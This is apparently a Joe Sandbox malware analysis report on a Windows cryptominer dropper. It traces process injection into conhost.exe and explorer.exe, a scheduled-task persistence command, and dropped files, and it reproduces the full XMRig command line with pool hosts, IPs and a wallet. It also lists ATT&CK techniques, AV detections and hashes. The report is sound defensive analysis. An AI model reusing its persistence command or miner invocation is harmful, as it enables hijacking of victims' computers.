Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140367000 value: 1E
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 1404A0000 value: F0
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140753000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140775000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140776000 value: C5
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140777000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140779000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 14077B000 value: 60
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 14077C000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 14077D000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: DB8010 value: 00
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\conhost.exe Thread register set: target process: 6764
Source: C:\Windows\System32\conhost.exe Thread register set: target process: 6784
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Thread created: C:\Windows\System32\conhost.exe EIP: 5EDE0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: 4E0E0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: 80EE0000
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Thread created: C:\Windows\System32\conhost.exe EIP: C3390000
Note: the entries above describe two injection stages. First, each dropper (pcNCraWcRk.exe, services64.exe, sihost64.exe) allocates an RWX region in a conhost.exe it has just started and creates a remote thread at that region's base (the EIP values are the low 32 bits of the allocation bases). Second, each injected conhost.exe writes a complete PE image into a newly created explorer.exe beginning at 0x140000000, the default x64 image base (the sandbox records the 4D5A header there), followed by section-sized writes up to 0x14077D000, one write outside the image (0x886010 in PID 6764, 0xDB8010 in PID 6784), and a thread context modification so the mapped image runs inside explorer.exe. The miner traffic therefore originates from explorer.exe, which is why the "System process connects to network" signature fires.
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
              Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior

Mitre Att&ck Matrix

(The number after a technique is the count of matched signatures for that cell, as shown in the original matrix.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation (1) | Windows Service (1) | Windows Service (1) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (21) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Command and Scripting Interpreter (1) | Scheduled Task/Job (1) | Process Injection (712) | Virtualization/Sandbox Evasion (111) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Scheduled Task/Job (1) | Logon Script (Windows) | Scheduled Task/Job (1) | Process Injection (712) | Security Account Manager | Virtualization/Sandbox Evasion (111) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information (1) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (1) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery (12) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

              Behavior Graph

Behavior Graph ID: 513056, Sample: pcNCraWcRk, Start date: 01/11/2021, Architecture: WINDOWS, Score: 100. The graph image is not recoverable here; its node and edge data are:

• Root: DNS xmr.givemexyz.in; signatures: Sigma detected: Xmrig; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 6 other signatures. Started processes: pcNCraWcRk.exe, services64.exe.
• pcNCraWcRk.exe: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection). Starts conhost.exe.
• services64.exe (root-started): Antivirus detection for dropped file; Multi AV Scanner detection for dropped file. Starts conhost.exe.
• conhost.exe (from pcNCraWcRk.exe): dropped C:\Users\user\AppData\...\services64.exe (PE32+) and C:\Users\...\services64.exe:Zone.Identifier (ASCII). Starts cmd.exe and cmd.exe.
• conhost.exe (from services64.exe): dropped C:\Users\user\AppData\...\sihost64.exe (PE32+); Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures. Starts sihost64.exe and explorer.exe.
• cmd.exe (first): starts services64.exe and conhost.exe.
• cmd.exe (second): Uses schtasks.exe or at.exe to add and modify task schedules. Starts conhost.exe and schtasks.exe.
• sihost64.exe: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Writes to foreign memory regions; 2 other signatures. Starts conhost.exe.
• services64.exe (from cmd.exe): Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection). Starts conhost.exe.
• conhost.exe (from that services64.exe): dropped C:\Users\user\AppData\Roaming\...\WR64.sys (PE32+); Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes. Starts explorer.exe.
• explorer.exe: contacts 198.23.214.117, 49763, 8080 (AS-COLOCROSSINGUS, United States) and xmr.givemexyz.in; System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs).
• 198.23.214.117: Detected Stratum mining protocol.


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

Source | Detection | Scanner | Label
pcNCraWcRk.exe | 65% | Virustotal |
pcNCraWcRk.exe | 31% | Metadefender |
pcNCraWcRk.exe | 81% | ReversingLabs | Win64.Trojan.Donut
pcNCraWcRk.exe | 100% | Avira | TR/Agent.wbqui

              Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | 100% | Avira | TR/Agent.ywcqa
C:\Users\user\AppData\Local\Temp\services64.exe | 100% | Avira | TR/Agent.wbqui
C:\Users\user\AppData\Local\Temp\services64.exe | 65% | Virustotal |
C:\Users\user\AppData\Local\Temp\services64.exe | 31% | Metadefender |
C:\Users\user\AppData\Local\Temp\services64.exe | 81% | ReversingLabs | Win64.Trojan.Donut
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 1% | Virustotal |
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 3% | Metadefender |
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 4% | ReversingLabs |
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | 49% | Metadefender |
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | 82% | ReversingLabs | Win64.Trojan.Donut

              Unpacked PE Files

Source | Detection | Scanner | Label
17.0.explorer.exe.140000000.12.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.6.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.2.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.0.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.11.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.8.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.1.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.4.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.7.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.12.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.13.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.8.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.7.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.5.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.9.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.10.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.0.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.6.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.1.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.13.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.10.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.3.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.9.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.11.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.2.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.5.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.4.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.3.unpack | 100% | Avira | HEUR/AGEN.1134782

              Domains

Source | Detection | Scanner | Label
xmr.givemexyz.in | 16% | Virustotal |

              URLs

Source | Detection | Scanner | Label
https://xmrig.com/benchmark/%s | 0% | URL Reputation | safe
https://xmrig.com/wizard | 0% | URL Reputation | safe
https://xmrig.com/wizard%s | 0% | URL Reputation | safe
https://xmrig.com/docs/algorithms | 0% | URL Reputation | safe

              Domains and IPs

              Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
xmr.givemexyz.in | 212.114.52.24 | true | true | | unknown

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://xmrig.com/benchmark/%s | conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
https://xmrig.com/wizard | conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | conhost.exe, 00000001.00000002.685200138.0000025F60DC1000.00000004.00000001.sdmp | false | | high
https://xmrig.com/wizard%s | conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
https://xmrig.com/docs/algorithms | conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown

                Contacted IPs


                Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.23.214.117 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true

                General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 513056
Start date: 01.11.2021
Start time: 18:19:07
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 29s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: pcNCraWcRk (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.evad.mine.winEXE@26/6@2/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 63.1% (good quality ratio 52.4%)
• Quality average: 41.6%
• Quality standard deviation: 27.2%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 44
• Number of non-executed functions: 8
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.209.183, 8.248.119.254, 8.238.85.254, 8.248.137.254, 8.241.126.249, 8.248.99.254, 173.222.108.147, 173.222.108.226
• Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, store-images.s-microsoft.com, wu-shim.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, arc.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net
• Not all processes were analyzed; the report is missing behavior information

                Simulations

                Behavior and APIs

Time | Type | Description
18:20:03 | API Interceptor | 1x Sleep call for process: pcNCraWcRk.exe modified
18:20:07 | API Interceptor | 4x Sleep call for process: conhost.exe modified
18:20:09 | Task Scheduler | Run new task: services64 path: C:\Users\user\AppData\Local\Temp\services64.exe
18:20:10 | API Interceptor | 2x Sleep call for process: services64.exe modified
18:20:13 | API Interceptor | 1x Sleep call for process: sihost64.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

Match | Associated Sample Name / URL | Detection | Context
xmr.givemexyz.in | oracleservice.exe | malicious | 212.114.52.24
xmr.givemexyz.in | nazi.exe | malicious | 194.5.249.24

                ASN

Match | Associated Sample Name / URL | Detection | Context
AS-COLOCROSSINGUS | Announcement.xlsx | malicious | 198.46.132.212
AS-COLOCROSSINGUS | Swift Transfer - Failure.xlsx | malicious | 192.227.158.116
AS-COLOCROSSINGUS | Inquiry files_00123.xlsx | malicious | 198.23.213.2
AS-COLOCROSSINGUS | flv0110121.xlsx | malicious | 198.23.213.2
AS-COLOCROSSINGUS | Document.exe | malicious | 107.175.32.198
AS-COLOCROSSINGUS | Booking.xlsx | malicious | 107.172.75.205
AS-COLOCROSSINGUS | SHIPPPING-DOC.xlsx | malicious | 198.46.199.161
AS-COLOCROSSINGUS | xE9 Players Full Profiles.xlsx | malicious | 198.46.199.161
AS-COLOCROSSINGUS | RFQ DTD011121- FAMORITALIA.xlsx | malicious | 107.173.191.112
AS-COLOCROSSINGUS | NEW ORDER (001) P000000000000 D02.xlsx | malicious | 192.227.158.118
AS-COLOCROSSINGUS | scan_documents.xlsx | malicious | 107.172.75.205
AS-COLOCROSSINGUS | VuMhXFFSwX.exe | malicious | 23.94.183.146
AS-COLOCROSSINGUS | 4oPbyzyFDC.rtf | malicious | 192.227.228.38
AS-COLOCROSSINGUS | new order sheet 0016.xlsx | malicious | 198.23.212.136
AS-COLOCROSSINGUS | agreement.xlsx | malicious | 198.46.199.161
AS-COLOCROSSINGUS | SHIPPING DOCUMENT.xlsx | malicious | 198.46.199.161
AS-COLOCROSSINGUS | new oder sheet 0015.xlsx | malicious | 198.23.212.136
AS-COLOCROSSINGUS | Statement of Account for OCTOBER 2021pdf.exe | malicious | 23.95.115.74
AS-COLOCROSSINGUS | RPA Purchase Order.xlsx | malicious | 107.172.13.131
AS-COLOCROSSINGUS | 008.xlsx | malicious | 198.23.212.136

                JA3 Fingerprints

                No context

                Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | FreeForYou.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | A3aCLmM4IV.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Software patch by Silensix.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f1.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | sWSfbao3sR.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Fortnite Hack Mod v1.4.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | LauncherHack.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Hack.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | ixijzt2mxt.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | GTA5TerrorMM.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | FANDER_MOD V3.03.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Injector.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Injector.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 61BoDeKl0u.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | ShinChangerFort.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Sapphire.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | p5x6Tk5245.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | install.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | wpXW8288lr.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | SecuriteInfo.com.Trojan.InjectNET.14.313.exe | malicious

                                                        Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Process: C:\Windows\System32\conhost.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 539
Entropy (8bit): 5.348465763088588
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPTxAIWzAbDLI4MNCIBTaDAWDLI4MWuCv:ML9E4Kr8sXE4+aE4Ks
MD5: AD3DC4BDB13FFE4ABD214A6EB4E5A519
SHA1: A2C3FCBCA3F40AE579E303AA8E8E2810860F088C
SHA-256: EEA4FDD5FA39D6145F4C5ABFB3BEB63C1D750B2BBA95D5D9D52F245AA07DC02D
SHA-512: 50E0046F80823EB299545C16DD4A027A6294CC74294AE12D9A40F62FB6F1E92319511E90486427F2FEE44E6BB3E1317EA582284FB6CD82CA1BE9B5F3614BBE12
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
C:\Users\user\AppData\Local\Temp\services64.exe
Process: C:\Windows\System32\conhost.exe
File Type: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 2234368
Entropy (8bit): 7.999681283638092
Encrypted: true
SSDEEP: 24576:1drStRzAeuEl5IJw6mgjogJlV50mtIJfBaH1NUqGCnW1lm/SIwDIGPvarynWZqJ3:LGRUEIRPlVydBLCelDI1m0yBJSXM/nP
MD5: 0958FA69BA0E6645C42215C5325D8F76
SHA1: 800666827E118CE78AEF55C47864512EF9D3B7A6
SHA-256: 1B0C9F3F22D25CD518E480798EE44E8876107B2D37B2E92997C039D4A6C69DB1
SHA-512: 95F582F9B45325951FE4CDC40CD5AE1037A955E437C052C64186641785F8170C7C9CB9532756166E267F0398217991C616AD86115EBB8D0B183898887950CC28
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Virustotal, Detection: 65%
• Antivirus: Metadefender, Detection: 31%
• Antivirus: ReversingLabs, Detection: 81%
C:\Users\user\AppData\Local\Temp\services64.exe:Zone.Identifier
Process: C:\Windows\System32\conhost.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Process: C:\Windows\System32\conhost.exe
File Type: PE32+ executable (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 14544
Entropy (8bit): 6.2660301556221185
Encrypted: false
SSDEEP: 192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5: 0C0195C48B6B8582FA6F6373032118DA
SHA1: D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256: 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512: AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious: true
Antivirus:
• Antivirus: Virustotal, Detection: 1%
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:
• Filename: FreeForYou.exe, Detection: malicious
• Filename: A3aCLmM4IV.exe, Detection: malicious
• Filename: Software patch by Silensix.exe, Detection: malicious
• Filename: 96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f1.exe, Detection: malicious
• Filename: sWSfbao3sR.exe, Detection: malicious
• Filename: Fortnite Hack Mod v1.4.exe, Detection: malicious
• Filename: LauncherHack.exe, Detection: malicious
• Filename: Hack.exe, Detection: malicious
• Filename: ixijzt2mxt.exe, Detection: malicious
• Filename: GTA5TerrorMM.exe, Detection: malicious
• Filename: FANDER_MOD V3.03.exe, Detection: malicious
• Filename: Injector.exe, Detection: malicious
• Filename: Injector.exe, Detection: malicious
• Filename: 61BoDeKl0u.exe, Detection: malicious
